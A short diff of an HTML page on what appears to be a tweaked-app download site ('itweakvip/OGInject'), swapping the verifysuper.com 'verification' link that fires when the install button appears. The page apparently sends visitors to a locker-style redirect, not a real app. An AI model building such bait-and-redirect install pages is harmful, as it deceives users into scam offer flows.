--- a/itweakvip/OGInject/5.html
+++ b/itweakvip/OGInject/5.html
@@ -124,7 +124,7 @@
         id("app_icon").src = icon;
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
-        window.lcr = "https://www.verifysuper.com/cl.php?id=a9a28551b79d73f8ceedee3a5e371820";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
